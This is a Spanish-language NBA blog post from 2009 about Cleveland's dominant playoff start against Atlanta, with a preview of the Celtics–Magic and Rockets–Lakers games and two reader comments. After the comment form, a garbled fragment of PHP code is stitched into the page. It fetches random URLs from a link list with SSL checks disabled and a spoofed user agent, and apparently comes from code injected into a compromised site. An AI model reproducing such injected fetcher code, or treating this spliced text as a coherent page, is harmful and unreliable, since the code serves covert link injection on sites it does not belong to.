Playoffs (07/05/2009): Lecciones de historia

08 de May de 2009 por MagicJohnson32

lbjtripleLecciones de historia: ¿Cuántos equipos de la NBA han ganado sus primeros seis partidos de Playoffs por 10 o más puntos? Uno, los Pacers de 2004. ¿Cuántos equipos de la NBA han ganado tres partidos consecutivos de Playoffs por 20 o más puntos? Uno, los Lakers de 1986. Hasta anoche, cuando los Cavs igualaron ambas marcas con su aplastante triunfo sobre los Hawks que sitúa la serie 2-0 y eleva el balance de Cleveland a 6 victorias en otros tantos partidos.

En estos seis encuentros, cuatro contra Detroit y dos contra Atlanta, los Cavaliers no han encontrado rival. Tal vez le esperen mayores complicaciones en el Phillips Arena pero por el momento no están dejando lugar a dudas: son el rival a batir. No sólo ganan: destrozan al adversario y lo hacen disfrutando. Mientras los Lakers y los Celtics sufren para sacar un 1-1 en sus respectivas eliminatorias, a los Cavs los partidos apenas les duran media parte. Anoche ganaban por 24 al descanso, y en el tercer cuarto elevaron la diferencia hasta los 36 puntos (47-83). El dominio de los Cavs se extiende a los dos lados de la cancha: en ataque anotaron un 53.5% de sus tiros, y en defensa anularon a Josh Smith y Joe Johnson, que apenas hicieron nada bien, y a un Bibby que pasó por el partido de forma discretísima, con lo que las ausencias de Marvin Williams y Al Horford se hicieron más evidentes.

Pasan los partidos y los Cavaliers todavía no tienen rival. ¿Algún voluntario?

PREMIOS

MVP: Sin necesidad de jugar en el último cuarto, LeBron James dirigió otro incontestable triunfo de los Cavs con 27 puntos (9 de 14 en tiros de campo), 5 asistencias, 4 robos y 3 rebotes en 31 minutos. James tuvo bibbyjoshtiempo de lucirse: no os perdáis el triple con el que cierra la primera mitad (el de la foto de arriba). Una locura.

La sorpresa: En los cinco primeros partidos de los Playoffs, Wally Szczerbiak había anotado un total de 13 puntos. Anoche el madrileño se sumó a la fiesta y logró 17 en 21 minutos con 7 de 9 en tiros de campo.

La decepción: La pareja que se supone que ha de liderar a los Hawks hizo un partido lamentable. Entre Josh Smith y Joe Johnson sumaron 18 puntos con 7 de 28 en tiros, 4 rebotes, 4 asistencias y 5 pérdidas. Por si fuera poco, Johnson se torció el tobillo y es duda para el próximo encuentro de la serie.

El mayor esfuerzo en vano: El único jugador que se salvó de la quema en los Hawks fue el sustituto del lesionado Marvin Williams, Maurice Evans, que cumplió con 16 puntos, 7 de 12 en tiros de campo, 4 asistencias y 3 rebotes.

RAZONES PARA TRASNOCHAR

Los finalistas de 2008 vuelven a compartir madrugada. Celtics y Lakers disputan esta noche sus respectivos terceros partidos contra Orlando y Houston con ambas series igualadas a 1. Los Magic recibirán a los campeones a partir de la 1.00 h con la baja de Rafer Alston tras su colleja a Eddie House, con lo que Anthony Johnson será titular en un partido de Playoffs por primera vez desde hace 3 años. Ante él estará uno de los protagonistas de las últimas semanas, Rajon Rondo. Vaya papeleta. Los Magic por su parte esperan que Turkoglu y especialmente Dwight Howard aumenten su artestkobelbowproducción. En sus manos están las opciones de Orlando.

A continuación, a partir de las 3.30 h y en directo por Cuatro, Rockets y Lakers trasladan su serie al Toyota Center. Todavía resuenan los ecos del eléctrico segundo partido, que vio las descalificaciones de Artest y Fisher. El base de los Lakers ha sido sancionado con un partido de suspensión por su carga contra Scola, mientras que el responsable de las sanciones disciplinarias, Stu Jackson, ha señalado que el codo de Kobe contra Artest fue, como se aprecia en el vídeo, contra el pecho y dentro de una pugna por el rebote (recordemos que las sanciones se aplican a contactos con el codo por encima del cuello en situaciones ajenas a la acción del juego). Dudamos mucho que las explicaciones de Jackson apacigüen a Artest, con lo que todo apunta a una gran batalla entre él y Kobe. ¡Bien por el espectáculo!

Comenta

2 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Anza zorro, dí que bien por el espectáculo. 😛 imparcial!!

    PD: Lo d los Cavs está siendo impresionante, ahora mismo a un nivel superior al resto. Me encantaría una final Cavs-Nuggets

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Está serie no podía ser al mejor de 3 partidos?

    Y si me apuras de 1.

    Viva el espectaculo (y las mujeres)¡¡¡¡

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>